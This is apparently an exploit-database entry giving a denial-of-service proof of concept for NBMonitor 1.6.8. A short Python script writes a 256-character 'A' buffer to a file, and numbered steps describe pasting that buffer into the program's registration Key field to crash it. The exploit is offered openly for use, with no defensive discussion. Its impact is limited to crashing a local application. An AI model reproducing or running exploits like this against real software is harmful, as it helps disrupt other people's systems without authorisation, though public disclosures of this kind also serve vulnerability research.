id: 36369
date: 06/08/2021
title: NBMonitor 1.6.8 - Denial of Service Exploit
author: Erick Galindo
cves: 

# Exploit Title: NBMonitor 1.6.8 - Denial of Service (PoC)
# Author: Erick Galindo 
# Vendor Homepage: http://www.nsauditor.com
# Software Link: http://www.nbmonitor.com/downloads/nbmonitor_setup.exe
# Version: 1.6.8
# Tested on: Windows 10 Pro x64 es

# Proof of Concept:
#1.- Copy printed "AAAAA..." string to clipboard!
#2.- Go to Register > Enter Registration Code...
#3.- Write anything in 'Name' field
#4.- Paste clipboard in 'Key' field
#5.- Click on button -> Ok

buffer = "\x41" * 256

f = open ("NBM.txt", "w")
f.write(buffer)
f.close()

#  0day.today [2023-03-25]  #